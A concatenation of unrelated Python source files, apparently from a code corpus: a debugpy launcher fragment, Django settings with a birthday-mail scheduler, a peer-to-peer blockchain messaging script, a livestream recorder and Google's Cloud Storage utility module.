wait_thread.start()
finally:
for fd in close_fds:
try:
os.close(fd)
except Exception:
log.swallow_exception()
def kill():
if process is None:
return
try:
if process.poll() is None:
log.info("Killing {0}", describe())
process.kill()
except Exception:
log.swallow_exception("Failed to kill {0}", describe())
def wait_for_exit():
try:
code = process.wait()
if sys.platform != "win32" and code < 0:
# On POSIX, if the process was terminated by a signal, Popen will use
# a negative returncode to indicate that - but the actual exit code of
# the process is always an unsigned number, and can be determined by
# taking the lowest 8 bits of that negative returncode.
code &= 0xFF
except Exception:
log.swallow_exception("Couldn't determine process exit code:")
code = -1
log.info("{0} exited with code {1}", describe(), code)
output.wait_for_remaining_output()
# Determine whether we should wait or not before sending "exited", so that any
# follow-up "terminate" requests don't affect the predicates.
should_wait = any(pred(code) for pred in wait_on_exit_predicates)
try:
launcher.channel.send_event("exited", {"exitCode": code})
except Exception:
pass
if should_wait:
_wait_for_user_input()
try:
launcher.channel.send_event("terminated")
except Exception:
pass
def _wait_for_user_input():
if sys.stdout and sys.stdin and sys.stdin.isatty():
from debugpy.common import log
try:
import msvcrt
except ImportError:
can_getch = False
else:
can_getch = True
if can_getch:
log.debug("msvcrt available - waiting for user input via getch()")
sys.stdout.write("Press any key to continue . . . ")
sys.stdout.flush()
msvcrt.getch()
else:
log.debug("msvcrt not available - waiting for user input via read()")
sys.stdout.write("Press Enter to continue . . . ")
sys.stdout.flush()
sys.stdin.read(1)
|
settings_20210906114807.py
|
"""
Django settings for First_Wish project.
Generated by 'django-admin startproject' using Django 3.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
import os
import environ
import threading
import schedule
import time
from First_Wish_Main_App.views import decrease_day_count_and_send_bday_mails
env_path = os.path.join(os.path.dirname(__file__), '../.env')
environ.Env.read_env(env_path)
# /////////////////////////////// SCHEDULE THE decrease_day_count_and_send_bday_mails ////////////////////
# Schedule the task to run once a day at the time given below (currently 11:47)
schedule.every().day.at("11:47").do(decrease_day_count_and_send_bday_mails)
def run_schedule_loop():
    while True:
        schedule.run_pending()
        time.sleep(60)
# Run the scheduler in a daemon thread so it does not block process shutdown
t1 = threading.Thread(target=run_schedule_loop, daemon=True)
t1.start()
# ///////////////////////////////SCHEDULE THE ENABLE BUTTON ENDS////////////////////
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
templates_path = os.path.join(BASE_DIR, 'templates')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.environ.get('DJANGO_SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'First_Wish_Main_App',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'First_Wish.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [templates_path],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'First_Wish.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Kolkata'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
|
main1.py
|
# run on your system
# new file
#test
import socket
import requests
import threading
import json
import datetime
import time
import netifaces as ni
import random
import pymongo
import hashlib
from blockchain import Blockchain
import sys
import _thread
ip = "http://192.168.43.168:5000"
page = "/ul"
login_p = '/logi'
logout_p = '/logout'
data = {
'num' : '1'
}
sport = 0
ssockets = []
chain_set=[]
lap = [12340,12341,12342,12344,12345,12346,12347]
user_count = len(lap)
message_queue=[]
# Login
def login(user):
d = {
'uname' : user
}
r = requests.post(url = ip+login_p, data = d)
return r.text
def logout():
print(threading.get_ident())
r = requests.post(url = ip+logout_p,data={'luname':myuname})
print('Successfully Logged out from server')
cclose()
print('Successfully Closed all sockets')
try:
_thread.interrupt_main()
except KeyboardInterrupt:
try:
_thread.interrupt_main()
except KeyboardInterrupt:
pass
pass
_thread.interrupt_main()
print('returning')
def get_active_users():
r = requests.post(url = ip+page, data = data)
user_list = r.text.split()
return user_list
def handle_transaction(msg):
send_all(blockchain.new_transaction(msg['sender'],msg['receiver'],msg['message'],msg['id'])[1])
def handle_randnum(msg):
blockchain.update_transactions(msg)
def handle_blockchain_request(blockchain_request):
# mybl=mydb.test.find({})
# bllt=[]
# for el in mybl:
# bllt.append(el)
bllt=blockchain.get_blockchain()
print(bllt)
a={'msg-type':'blockchain','blockchain':bllt}
send_msg(a,blockchain_request['sip'])
def handle_blockchain(received_blockchain):
global chain_set
received_blockchain=received_blockchain['blockchain']
    chain_set.append(received_blockchain)
def handle_msg(msg):
print(threading.get_ident())
try:
if(msg['msg-type']=='transaction'):
handle_transaction(msg)
elif(msg['msg-type']=='random_number'):
handle_randnum(msg)
elif(msg['msg-type']=='blockchain_request'):
handle_blockchain_request(msg)
elif(msg['msg-type']=='blockchain'):
handle_blockchain(msg)
except Exception as e:
print(e)
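# Illustrative only: the shape of the JSON messages dispatched by handle_msg().
# Field names mirror the handlers above; the values are made-up placeholders.
def example_messages():
    transaction = {'msg-type': 'transaction', 'sender': 'alice', 'receiver': 'bob',
                   'message': 'hello', 'id': 1}
    chain_request = {'msg-type': 'blockchain_request', 'sip': '192.168.43.10'}
    return [transaction, chain_request]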
def dl():
print('dl is created')
port=5001
sdl = socket.socket()
sdl.bind(('',port))
sdl.listen(5)
while(True):
c,addr = sdl.accept()
hval='hey'
hval=json.dumps(hval).encode('utf-8')
c.send(hval)
nt = json.loads(c.recv(1024).decode('utf-8'))
if 'logout' in nt.keys():
logout()
c.close()
_thread.interrupt_main()
return
else:
print(threading.get_ident())
print('received transaction from html')
temp=blockchain.new_transaction(nt['sender'],nt['receiver'],nt['message'])
send_all(temp[0])
send_all(temp[1])
c.close()
def socket_listen(soc, port):
print('listening on')
print(port)
soc.bind(('', port))
soc.listen()
while True:
c, addr = soc.accept()
val='connected'
val=json.dumps(val).encode('utf-8')
c.send(val)
msg = c.recv(1024)
msg=json.loads(msg.decode('utf-8'))
print('received')
print(msg)
val='received'
val=json.dumps(val).encode('utf-8')
c.send(val)
handle_msg(msg)
c.close()
def init():
global sport,me,myuname
myuname=sys.argv[1]
sport=int(login(myuname))
global ssockets
ssockets = [socket.socket(socket.AF_INET, socket.SOCK_STREAM) for _ in range(user_count)]
me = str(ni.ifaddresses('wlan0')[ni.AF_INET][0]['addr'])
print(me)
print('sport')
print(sport)
c1 = -1
for soc in ssockets:
c1 += 1
if(lap[c1] == sport):
continue
threading.Thread(target = socket_listen,args = (soc, lap[c1])).start()
threading.Thread(target=dl).start()
threading.Thread(target=b_send_msg).start()
global blockchain
blockchain = Blockchain(sys.argv[1])
threading.Thread(target=chek).start()
def send_msg(msg,sip):
global message_queue
message_queue.append([msg,sip])
def b_send_msg():
global message_queue
while(True):
if(len(message_queue)!=0):
m1=message_queue.pop(0)
a_send_msg(m1[0],m1[1])
def a_send_msg(msg,sip):
# if(msg=='close'):
# cclose()
# if(msg == 'logout'):
# logout()
soc = socket.socket()
# print('portszz')
# print(sip)
# print(sport)
soc.connect((sip,sport))
s1=json.loads(soc.recv(1024).decode('utf-8'))
msg=json.dumps(msg).encode('utf-8')
print('sending')
print(msg)
soc.send(msg)
rs=json.loads(soc.recv(1024).decode('utf-8'))
# print(rs)
soc.close()
return rs
def send_all(msg):
ul1=get_active_users()
rsl=[]
for us in ul1:
if(us != me):
print(us,me)
rsl.append(send_msg(msg,us))
return rsl
def cclose():
for s in ssockets:
s.close()
def get_majority_element(n_list):
    # Boyer-Moore majority vote: the first pass picks a candidate,
    # the second pass verifies that it really is a strict majority.
    candidate = None
    count = 0
    for el in n_list:
        if count == 0:
            candidate = el
            count = 1
        elif type(candidate) == type(el) and candidate == el:
            count = count + 1
        else:
            count = count - 1
    occurrences = 0
    for el in n_list:
        if el == candidate:
            occurrences = occurrences + 1
    is_majority = occurrences > len(n_list) / 2
    return candidate, is_majority
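# Quick illustrative check of get_majority_element() (not called anywhere in the
# script): a strict majority is reported only when one value fills more than half
# the list.
def _example_majority_check():
    assert get_majority_element([3, 3, 2, 3])[1]
    assert not get_majority_element([1, 2, 3])[1]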
def validate_and_update(update_necessary=True):
global chain_set,me
print(me)
sm=blockchain.valid_chain()
if sm==False or update_necessary:
blockchain.update_state=True
# u1=mydb.test.find({})
# l1=[]
# for el in u1:
# l1.append(el)
chain_set.append(blockchain.get_blockchain())
print(chain_set)
send_all({'msg-type':'blockchain_request','sip':me})
nu=get_active_users()
blockchain.clear_blockchain()
blockchain.create_genesis_block()
        while len(chain_set) != len(nu):
pass
if len(chain_set)==1:
blockchain.update_state=False
return
maxl=[len(el) for el in chain_set]
maxl,is_there=get_majority_element(maxl)
        if not is_there:
maxl=min([len(el) for el in chain_set])
for el in range(1,maxl):
blockchain.insert_block(get_majority_element([el1[el] for el1 in chain_set])[0])
chain_set=[]
blockchain.update_state=False
def chek():
global blockchain
while True:
if len(blockchain.mineadd)!=0 and blockchain.update_state==False:
# sm=blockchain.valid_chain()
# print('valid chain')
# print(sm)
# if sm:
# temp=blockchain.mineadd.pop()
# blockchain.mine(temp)
# else:
# blockchain.update_chain()
validate_and_update(1)
temp=blockchain.mineadd.pop()
blockchain.mine(temp)
time.sleep(0.5)
init()
|
pccold.py
|
# coding: utf-8
"""
===================================================
__
_______ ______ ______ _____ | | ___
| __ || ___| | ___| / \ | | ___| |
| ___|| |____ | |____ | o || |_ | ___ |
|___| |_______||_______| \_____/ |____||_______|
===================================================
2018/10/5 by DKZ https://davidkingzyb.tech
"""
import json
import time
import subprocess
import threading
import logging
import sys
import os
import signal
import traceback
import re
import requests
from .tools import sendEmails,saveStream,testRoomStatus,pidpool,ReturnCodeObserverThread,SleepKillerThread
from .bypyrm import psCheck,initBypyRmEmail,bypyrm,doBypy
from .config import conf
is_live=False
#log set
logging.basicConfig(level=logging.INFO,
format='%(asctime)s [line:%(lineno)d] %(levelname)s %(message)s',
datefmt='%m/%d %H:%M:%S',
filename=conf.log_path,
filemode='a')
# console = logging.StreamHandler()
# console.setLevel(logging.INFO)
# formatter = logging.Formatter('%(name)-12s: %(message)s')
# console.setFormatter(formatter)
# logging.getLogger('').addHandler(console)
def main():
global conf
try:
global is_live
room_obj=testRoomStatus()
logging.info('show_status:'+str(room_obj.get('show_status'))+' videoLoop:'+str(room_obj.get('videoLoop')))
if room_obj.get('show_status')==1 and room_obj.get('videoLoop')==0:
logging.info('live on')
if not is_live:
is_live=True
t=threading.Thread(target=sendEmails,args=(room_obj,))
t.start()
now_time=time.strftime('_%m_%d_%H_%M',time.localtime(time.time()))
room_name=room_obj.get('room_name','default')
room_name=re.sub(r"[\/\\\:\*\?\"\<\>\| \$\^\+\-\!]",'_',room_name)
saveStream(conf.stream_type,room_name+now_time+'.mp4',None)
elif room_obj.get('show_status')==2:
time.sleep(90)
tt=threading.Thread(target=main)
tt.start()
if is_live:
is_live=False
if conf.is_bypy:
shell=doBypy()
returncode=shell.wait()
logging.info('bypy returncode '+str(returncode))
if returncode==0 and conf.is_bypy_rm:
bypyrm()
else:
time.sleep(90)
tt=threading.Thread(target=main)
tt.start()
except Exception as e:
logging.warning('*** main fail')
logging.warning(e)
tb=traceback.format_exc()
logging.warning(tb)
pp=pidpool.copy()
for k,v in pp.items():
try:
os.killpg(os.getpgid(int(k)),signal.SIGKILL)
logging.info('main kill '+k)
except Exception as e:
logging.info('*** main kill err '+k)
time.sleep(60)
ttt=threading.Thread(target=main)
ttt.start()
ReturnCodeObserverThread.main=main
SleepKillerThread.main=main
if __name__ == '__main__':
logging.info('start pccold')
main()
|
gs_utils.py
|
#!/usr/bin/python
# pylint: disable=C0301
"""
Copyright 2014 Google Inc.
Use of this source code is governed by a BSD-style license that can be
found in the LICENSE file.
Utilities for accessing Google Cloud Storage, using the boto library (wrapper
for the XML API).
API/library references:
- https://developers.google.com/storage/docs/reference-guide
- http://googlecloudstorage.blogspot.com/2012/09/google-cloud-storage-tutorial-using-boto.html
"""
# pylint: enable=C0301
# System-level imports
import errno
import hashlib
import math
import os
import posixpath
import Queue
import re
import sys
import threading
import time
# Imports from third-party code
TRUNK_DIRECTORY = os.path.abspath(os.path.join(
os.path.dirname(__file__), os.pardir, os.pardir))
for import_subdir in ['boto']:
import_dirpath = os.path.join(
TRUNK_DIRECTORY, 'third_party', 'externals', import_subdir)
if import_dirpath not in sys.path:
# We need to insert at the beginning of the path, to make sure that our
# imported versions are favored over others that might be in the path.
sys.path.insert(0, import_dirpath)
from boto.exception import BotoServerError
from boto.gs import acl
from boto.gs.bucket import Bucket
from boto.gs.connection import GSConnection
from boto.gs.key import Key
from boto.s3.bucketlistresultset import BucketListResultSet
from boto.s3.connection import SubdomainCallingFormat
from boto.s3.prefix import Prefix
# How many files to upload at once, by default.
# TODO(epoger): Is there a way to compute this intelligently? To some extent
# it is a function of how many cores are on the machine, and how many other
# processes it is running; but it's probably more a function of how much time
# each core sits idle waiting for network I/O to complete.
DEFAULT_UPLOAD_THREADS = 10
GS_PREFIX = 'gs://'
class AnonymousGSConnection(GSConnection):
"""GSConnection class that allows anonymous connections.
The GSConnection class constructor in
https://github.com/boto/boto/blob/develop/boto/gs/connection.py doesn't allow
for anonymous connections (connections without credentials), so we have to
override it.
"""
def __init__(self):
super(GSConnection, self).__init__(
# This is the important bit we need to add...
anon=True,
# ...and these are just copied in from GSConnection.__init__()
bucket_class=Bucket,
calling_format=SubdomainCallingFormat(),
host=GSConnection.DefaultHost,
provider='google')
class GSUtils(object):
"""Utilities for accessing Google Cloud Storage, using the boto library."""
class Permission:
"""Fine-grained permissions that may be set per user/group on each file.
See SupportedPermissions in
https://github.com/boto/boto/blob/develop/boto/gs/acl.py
Also see https://developers.google.com/storage/docs/accesscontrol
"""
EMPTY = None
OWNER = 'FULL_CONTROL'
READ = 'READ'
WRITE = 'WRITE'
class PredefinedACL:
"""Canned ACLs that provide a "base coat" of permissions for each file.
See CannedACLStrings in
https://github.com/boto/boto/blob/develop/boto/gs/acl.py
Also see https://developers.google.com/storage/docs/accesscontrol
"""
AUTHENTICATED_READ = 'authenticated-read'
BUCKET_OWNER_FULL_CONTROL = 'bucket-owner-full-control'
BUCKET_OWNER_READ = 'bucket-owner-read'
PRIVATE = 'private'
PROJECT_PRIVATE = 'project-private'
PUBLIC_READ = 'public-read'
PUBLIC_READ_WRITE = 'public-read-write'
class IdType:
"""Types of identifiers we can use to set "fine-grained" ACLs."""
GROUP_BY_DOMAIN = acl.GROUP_BY_DOMAIN
GROUP_BY_EMAIL = acl.GROUP_BY_EMAIL
GROUP_BY_ID = acl.GROUP_BY_ID
USER_BY_EMAIL = acl.USER_BY_EMAIL
USER_BY_ID = acl.USER_BY_ID
class UploadIf:
"""Cases in which we will upload a file.
Beware of performance tradeoffs. E.g., if you are uploading just one small
file, the extra round trip to check for file existence and/or checksum may
take longer than just uploading the file.
See http://skbug.com/2778 ('gs_utils: when uploading IF_NEW, batch up
checks for existing files within a single remote directory')
"""
ALWAYS = 1 # always upload the file
IF_NEW = 2 # if there is an existing file with the same name,
# leave it alone
IF_MODIFIED = 3 # if there is an existing file with the same name and
# contents, leave it alone
def __init__(self, boto_file_path=None):
"""Constructor.
Params:
boto_file_path: full path (local-OS-style) on local disk where .boto
credentials file can be found. If None, fall back on the
AWS_CREDENTIAL_FILE environment variable, then look in a set of
common paths for the .boto file. If no .boto file is found, then the
GSUtils object created will be able to access only public files in
Google Storage.
Raises an exception if no file is found at boto_file_path, or if the file
found there is malformed.
"""
self._gs_access_key_id = None
self._gs_secret_access_key = None
if not boto_file_path:
if os.environ.get('AWS_CREDENTIAL_FILE'):
boto_file_path = os.path.expanduser(os.environ['AWS_CREDENTIAL_FILE'])
if not boto_file_path:
for path in (os.path.join(os.path.expanduser('~'), '.boto'),):
if os.path.isfile(path):
boto_file_path = path
break
if boto_file_path:
print ('Reading boto file from %s' % boto_file_path)
boto_dict = _config_file_as_dict(filepath=boto_file_path)
self._gs_access_key_id = boto_dict['gs_access_key_id']
self._gs_secret_access_key = boto_dict['gs_secret_access_key']
else:
print >> sys.stderr, 'Warning: no .boto file found.'
# Which field we get/set in ACL entries, depending on IdType.
self._field_by_id_type = {
self.IdType.GROUP_BY_DOMAIN: 'domain',
self.IdType.GROUP_BY_EMAIL: 'email_address',
self.IdType.GROUP_BY_ID: 'id',
self.IdType.USER_BY_EMAIL: 'email_address',
self.IdType.USER_BY_ID: 'id',
}
def delete_file(self, bucket, path):
"""Delete a single file within a GS bucket.
TODO(epoger): what if bucket or path does not exist? Should probably raise
an exception. Implement, and add a test to exercise this.
Params:
bucket: GS bucket to delete a file from
path: full path (Posix-style) of the file within the bucket to delete
"""
b = self._connect_to_bucket(bucket=bucket)
key = Key(b)
key.name = path
try:
key.delete()
except BotoServerError, e:
e.body = (repr(e.body) +
' while deleting gs://%s/%s' % (b.name, path))
raise
def get_last_modified_time(self, bucket, path):
"""Gets the timestamp of when this file was last modified.
Params:
bucket: GS bucket in which to look for the file
path: full path (Posix-style) of the file within the bucket to check
Returns the last modified time, as a freeform string. If the file was not
found, returns None.
"""
b = self._connect_to_bucket(bucket=bucket)
try:
key = b.get_key(key_name=path)
if not key:
return None
return key.last_modified
except BotoServerError, e:
e.body = (repr(e.body) +
' while getting attributes of gs://%s/%s' % (b.name, path))
raise
def upload_file(self, source_path, dest_bucket, dest_path,
upload_if=UploadIf.ALWAYS,
predefined_acl=None,
fine_grained_acl_list=None):
"""Upload contents of a local file to Google Storage.
params:
source_path: full path (local-OS-style) on local disk to read from
dest_bucket: GS bucket to copy the file to
dest_path: full path (Posix-style) within that bucket
upload_if: one of the UploadIf values, describing in which cases we should
upload the file
predefined_acl: which predefined ACL to apply to the file on Google
Storage; must be one of the PredefinedACL values defined above.
If None, inherits dest_bucket's default object ACL.
fine_grained_acl_list: list of (id_type, id_value, permission) tuples
to apply to the uploaded file (on top of the predefined_acl),
or None if predefined_acl is sufficient
TODO(epoger): Consider adding a do_compress parameter that would compress
the file using gzip before upload, and add a "Content-Encoding:gzip" header
so that HTTP downloads of the file would be unzipped automatically.
See https://developers.google.com/storage/docs/gsutil/addlhelp/
WorkingWithObjectMetadata#content-encoding
"""
b = self._connect_to_bucket(bucket=dest_bucket)
local_md5 = None # filled in lazily
if upload_if == self.UploadIf.IF_NEW:
old_key = b.get_key(key_name=dest_path)
if old_key:
print ('Skipping upload of existing file gs://%s/%s' % (
b.name, dest_path))
return
elif upload_if == self.UploadIf.IF_MODIFIED:
old_key = b.get_key(key_name=dest_path)
if old_key:
if not local_md5:
local_md5 = _get_local_md5(path=source_path)
if ('"%s"' % local_md5) == old_key.etag:
print (
'Skipping upload of unmodified file gs://%s/%s : %s' % (
b.name, dest_path, local_md5))
return
elif upload_if != self.UploadIf.ALWAYS:
raise Exception('unknown value of upload_if: %s' % upload_if)
# Upload the file using a temporary name at first, in case the transfer
# is interrupted partway through.
if not local_md5:
local_md5 = _get_local_md5(path=source_path)
initial_key = Key(b)
initial_key.name = dest_path + '-uploading-' + local_md5
try:
initial_key.set_contents_from_filename(filename=source_path,
policy=predefined_acl)
except BotoServerError, e:
e.body = (repr(e.body) +
' while uploading source_path=%s to gs://%s/%s' % (
source_path, b.name, initial_key.name))
raise
# Verify that the file contents were uploaded successfully.
#
# TODO(epoger): Check whether the boto library or XML API already do this...
# if so, we may be duplicating effort here, and maybe we don't need to do
# the whole "upload using temporary filename, then rename" thing.
#
# TODO(epoger): Confirm that the etag is set on the server side...
# otherwise, we may just be validating another MD5 hash that was generated
# on the client side before the file was uploaded!
validate_key = b.get_key(key_name=initial_key.name)
if validate_key.etag != ('"%s"' % local_md5):
raise Exception('found wrong MD5 after uploading gs://%s/%s' % (
b.name, validate_key.name))
# Rename the file to its real name.
#
# TODO(epoger): I don't know how long this takes. I wish we could rename
# the key instead, but AFAICT you can't do that.
# Perhaps we could use Key.compose() to create a composite object pointing
# at the original key?
# See https://developers.google.com/storage/docs/composite-objects
final_key = b.copy_key(
new_key_name=dest_path, src_key_name=initial_key.name,
src_bucket_name=b.name, preserve_acl=False)
initial_key.delete()
# Set ACLs on the file.
# We do this *after* copy_key(), because copy_key's preserve_acl
# functionality would incur a performance hit.
for (id_type, id_value, permission) in fine_grained_acl_list or []:
self.set_acl(
bucket=b, path=final_key.name,
id_type=id_type, id_value=id_value, permission=permission)
def upload_dir_contents(self, source_dir, dest_bucket, dest_dir,
num_threads=DEFAULT_UPLOAD_THREADS,
upload_if=UploadIf.ALWAYS, **kwargs):
"""Recursively upload contents of a local directory to Google Storage.
params:
source_dir: full path (local-OS-style) on local disk of directory to copy
contents of
dest_bucket: GS bucket to copy the files into
dest_dir: full path (Posix-style) within that bucket; write the files into
this directory. If None, write into the root directory of the bucket.
num_threads: how many files to upload at once
upload_if: one of the UploadIf values, describing in which cases we should
upload the file
kwargs: any additional keyword arguments "inherited" from upload_file()
The copy operates as a merge: any files in source_dir will be "overlaid" on
top of the existing content in dest_dir. Existing files with the same names
may or may not be overwritten, depending on the value of upload_if.
TODO(epoger): Upload multiple files simultaneously to reduce latency.
"""
b = self._connect_to_bucket(bucket=dest_bucket)
if not dest_dir:
dest_dir = ''
# Create a set of all files within source_dir.
source_fileset = set()
prefix_length = len(source_dir)+1
for dirpath, _, filenames in os.walk(source_dir):
relative_dirpath = dirpath[prefix_length:]
for filename in filenames:
source_fileset.add(os.path.join(relative_dirpath, filename))
num_files_total = len(source_fileset)
# If we are only uploading files conditionally, remove any unnecessary
# files from source_fileset.
if upload_if == self.UploadIf.ALWAYS:
pass # there are no shortcuts... upload them all
else:
# Create a mapping of filename to Key for existing files within dest_dir
existing_dest_filemap = {}
prefix = dest_dir
if prefix and not prefix.endswith('/'):
prefix += '/'
prefix_length = len(prefix)
items = BucketListResultSet(bucket=b, prefix=prefix)
for item in items:
if type(item) is Key:
existing_dest_filemap[item.name[prefix_length:]] = item
# Now, depending on upload_if, trim files we should skip uploading.
files_in_common = source_fileset.intersection(
existing_dest_filemap.keys())
if upload_if == self.UploadIf.IF_NEW:
source_fileset -= files_in_common
elif upload_if == self.UploadIf.IF_MODIFIED:
for rel_path in files_in_common:
local_md5 = '"%s"' % _get_local_md5(path=os.path.join(
source_dir, rel_path))
key = existing_dest_filemap[rel_path]
if local_md5 == key.etag:
source_fileset.remove(rel_path)
else:
raise Exception('unknown value of upload_if: %s' % upload_if)
# Upload any files still in source_fileset.
num_files_to_upload = len(source_fileset)
print ('Uploading %d files, skipping %d ...' % (
num_files_to_upload, num_files_total - num_files_to_upload))
if num_files_to_upload == 0:
return
if num_threads > num_files_to_upload:
num_threads = num_files_to_upload
# Create a work queue with all files that need to be uploaded.
q = Queue.Queue(maxsize=num_files_to_upload)
for rel_path in source_fileset:
q.put(rel_path)
err = {}
# Spin up worker threads to read from the task queue.
def worker():
while True:
try:
rel_path = q.get(block=False)
except Queue.Empty:
return # no more tasks in the queue, so exit
print (' Uploading file %d/%d: %s' % (
num_files_to_upload - q.qsize(), num_files_to_upload, rel_path))
retries = 5
for retry in range(retries):
try:
self.upload_file(
source_path=os.path.join(source_dir, rel_path),
dest_bucket=b,
dest_path=posixpath.join(dest_dir, rel_path),
upload_if=self.UploadIf.ALWAYS,
**kwargs)
q.task_done()
break
except Exception as error:
if retry < retries - 1:
print ' Retrying upload, attempt #%d' % (retry + 1)
time.sleep(2 ** retry)
else:
err[rel_path] = error
for _ in range(num_threads):
t = threading.Thread(target=worker)
t.daemon = True
t.start()
# Block until all files have been uploaded and all workers have exited.
q.join()
if err:
errMsg = 'Failed to upload the following: \n\n'
for rel_path, e in err.iteritems():
errMsg += '%s: %s\n' % (rel_path, e)
raise Exception(errMsg)
def download_file(self, source_bucket, source_path, dest_path,
create_subdirs_if_needed=False, source_generation=None):
"""Downloads a single file from Google Cloud Storage to local disk.
Args:
source_bucket: GS bucket to download the file from
source_path: full path (Posix-style) within that bucket
dest_path: full path (local-OS-style) on local disk to copy the file to
create_subdirs_if_needed: boolean; whether to create subdirectories as
needed to create dest_path
source_generation: the generation version of the source
"""
b = self._connect_to_bucket(bucket=source_bucket)
key = Key(b)
key.name = source_path
if source_generation:
key.generation = source_generation
if create_subdirs_if_needed:
_makedirs_if_needed(os.path.dirname(dest_path))
with open(dest_path, 'w') as f:
try:
key.get_contents_to_file(fp=f)
except BotoServerError, e:
e.body = (repr(e.body) +
' while downloading gs://%s/%s to local_path=%s' % (
b.name, source_path, dest_path))
raise
def download_dir_contents(self, source_bucket, source_dir, dest_dir):
"""Recursively download contents of a Google Storage directory to local disk
params:
source_bucket: GS bucket to copy the files from
source_dir: full path (Posix-style) within that bucket; read the files
from this directory
dest_dir: full path (local-OS-style) on local disk of directory to copy
the files into
The copy operates as a "merge with overwrite": any files in source_dir will
be "overlaid" on top of the existing content in dest_dir. Existing files
with the same names will be overwritten.
TODO(epoger): Download multiple files simultaneously to reduce latency.
"""
_makedirs_if_needed(dest_dir)
b = self._connect_to_bucket(bucket=source_bucket)
(dirs, files) = self.list_bucket_contents(
bucket=source_bucket, subdir=source_dir)
for filename in files:
key = Key(b)
key.name = posixpath.join(source_dir, filename)
dest_path = os.path.join(dest_dir, filename)
with open(dest_path, 'w') as f:
try:
key.get_contents_to_file(fp=f)
except BotoServerError, e:
e.body = (repr(e.body) +
' while downloading gs://%s/%s to local_path=%s' % (
b.name, key.name, dest_path))
raise
for dirname in dirs:
self.download_dir_contents( # recurse
source_bucket=source_bucket,
source_dir=posixpath.join(source_dir, dirname),
dest_dir=os.path.join(dest_dir, dirname))
def get_acl(self, bucket, path, id_type, id_value):
"""Retrieve partial access permissions on a single file in Google Storage.
Various users who match this id_type/id_value pair may have access rights
other than that returned by this call, if they have been granted those
rights based on *other* id_types (e.g., perhaps they have group access
rights, beyond their individual access rights).
TODO(epoger): What if the remote file does not exist? This should probably
raise an exception in that case.
Params:
bucket: GS bucket
path: full path (Posix-style) to the file within that bucket
id_type: must be one of the IdType values defined above
id_value: get permissions for users whose id_type field contains this
value
Returns: the Permission value which has been set for users matching
this id_type/id_value, on this file; or Permission.EMPTY if no such
permissions have been set.
"""
field = self._field_by_id_type[id_type]
b = self._connect_to_bucket(bucket=bucket)
acls = b.get_acl(key_name=path)
matching_entries = [entry for entry in acls.entries.entry_list
if (entry.scope.type == id_type) and
(getattr(entry.scope, field) == id_value)]
if matching_entries:
assert len(matching_entries) == 1, '%d == 1' % len(matching_entries)
return matching_entries[0].permission
else:
return self.Permission.EMPTY
def set_acl(self, bucket, path, id_type, id_value, permission):
"""Set partial access permissions on a single file in Google Storage.
Note that a single set_acl() call will not guarantee what access rights any
given user will have on a given file, because permissions are additive.
(E.g., if you set READ permission for a group, but a member of that group
already has WRITE permission, that member will still have WRITE permission.)
TODO(epoger): Do we know that for sure? I *think* that's how it works...
If there is already a permission set on this file for this id_type/id_value
combination, this call will overwrite it.
TODO(epoger): What if the remote file does not exist? This should probably
raise an exception in that case.
Params:
bucket: GS bucket
path: full path (Posix-style) to the file within that bucket
id_type: must be one of the IdType values defined above
id_value: add permission for users whose id_type field contains this value
permission: permission to add for users matching id_type/id_value;
must be one of the Permission values defined above.
If Permission.EMPTY, then any permissions will be granted to this
particular id_type/id_value will be removed... but, given that
permissions are additive, specific users may still have access rights
based on permissions given to *other* id_type/id_value pairs.
Example Code:
bucket = 'gs://bucket-name'
path = 'path/to/file'
id_type = IdType.USER_BY_EMAIL
id_value = 'epoger@google.com'
set_acl(bucket, path, id_type, id_value, Permission.READ)
assert Permission.READ == get_acl(bucket, path, id_type, id_value)
set_acl(bucket, path, id_type, id_value, Permission.WRITE)
assert Permission.WRITE == get_acl(bucket, path, id_type, id_value)
"""
field = self._field_by_id_type[id_type]
b = self._connect_to_bucket(bucket=bucket)
acls = b.get_acl(key_name=path)
# Remove any existing entries that refer to the same id_type/id_value,
